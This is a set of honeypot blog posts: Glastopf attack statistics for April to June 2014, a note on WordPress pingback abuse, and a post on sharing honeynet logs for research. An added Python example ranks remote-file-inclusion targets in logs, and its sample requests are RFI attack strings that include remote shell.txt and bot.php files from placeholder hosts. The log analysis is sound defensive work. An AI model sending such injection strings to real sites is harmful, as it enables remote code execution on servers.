Global Glastopf statistics for June 2014

08 Aug 2014 Mikael Keri glastopf logs reports statistics

During the month of June, the following information was obtained from Glastopf installations worldwide:

Geographical spread

10 most popular injected files during the period

Short introduction to RFI:

“Remote File Inclusion (RFI) is a type of vulnerability most often found on websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation. This can lead to something as minimal as outputting the contents of the file or more serious events such as: Code execution on the web server ..” (source: Wikipedia)
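One way a sensor operator could derive a "most popular injected files" ranking from raw request lines, shown as an added example that is not Glastopf's code or part of the original post. The request lines are constructed, the hosts are placeholders, and the helper names `rfi_targets` and `top_filenames` are hypothetical.

```python
from collections import Counter
from posixpath import basename
from urllib.parse import parse_qsl, urlsplit

# Constructed request lines for illustration (not Glastopf data); hosts are placeholders.
SAMPLE_REQUESTS = [
    "GET /index.php?page=http://files.example.net/a/shell.txt? HTTP/1.1",
    "GET /view.php?inc=http%3A%2F%2Fcdn.example.org%2Fbot.php%3F HTTP/1.1",
    "GET /index.php?page=hTTp://other.example.com/shell.txt HTTP/1.1",
    "GET /go.php?file=ftp://ftp.example.net/pub/bot.php&x=1 HTTP/1.1",
    "GET /index.php?page=https://files.example.net/shell.txt HTTP/1.1",
    "GET /index.php?page=about HTTP/1.1",             # ordinary local value
    "GET /search?q=see+http://example.com HTTP/1.1",  # URL mentioned, not the whole value
    "malformed line",
]

REMOTE_SCHEMES = {"http", "https", "ftp"}


def rfi_targets(request_line):
    """Return parameter values that are, as a whole, a remote URL (an RFI attempt)."""
    parts = request_line.split()
    if len(parts) != 3:  # expect "METHOD target VERSION"
        return []
    targets = []
    # parse_qsl percent-decodes, so encoded URLs are caught as well
    for _name, value in parse_qsl(urlsplit(parts[1]).query, keep_blank_values=True):
        value = value.strip()
        try:
            url = urlsplit(value)  # the scheme comes back lowercased
        except ValueError:         # e.g. an unbalanced "[" in the host part
            continue
        if url.scheme in REMOTE_SCHEMES and url.netloc:
            targets.append(value)
    return targets


def top_filenames(request_lines, n=10):
    """Rank the file names of the remote URLs seen across all request lines."""
    counts = Counter()
    for line in request_lines:
        for target in rfi_targets(line):
            counts[basename(urlsplit(target).path) or "(no filename)"] += 1
    return counts.most_common(n)


if __name__ == "__main__":
    for name, hits in top_filenames(SAMPLE_REQUESTS):
        print(f"{name}\t{hits}")
```
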

Global Glastopf statistics for April 2014

16 Jul 2014 Mikael Keri glastopf logs report statistics

During the month of April, the following information was obtained from Glastopf installations worldwide:

Number of alerts for the period: 1325919

Filenames (RFI) - 10 most common during the period:

Hashes - 10 most common during the period:


Specifically newsworthy event: “Ping back”

pingback.ping, which is a legit WordPress feature, is misused to DoS victims using legit WordPress sites.

Global Glastopf statistics for May 2014

16 Jul 2014 Mikael Keri glastopf logs reports statistic

During the month of May, the following information was obtained from Glastopf installations worldwide:

Number of alerts for the period: 1859863

Filenames (RFI) - 10 most popular during the period:

Hashes - 10 most popular during the period:


Ping back

pingback.ping, which is a legit WordPress feature, is misused to DoS victims using legit WordPress sites.

Free Honeynet Log Data for Research

26 Jun 2009 Anton Chuvakin data honeynet honeypot linux logging logs research security

UPDATE: the log data is posted here.  A notification group about new log sharing is here.

This WASL 2009 workshop reminded me that I always used to bitch that some academic researchers use antediluvian data sets for their research (Lincoln Labs 1998 set used in 2008 “security research” makes me want to just curse and kick people in the balls, then laugh, then cry, then cry more…).

However, why are they doing it? Don’t they realize that testing their “innovative intrusion detection” or “neural network-based log analysis” on such prehistoric data will not render it relevant to today’s threats? And will only ensure ensuing hilarity :-)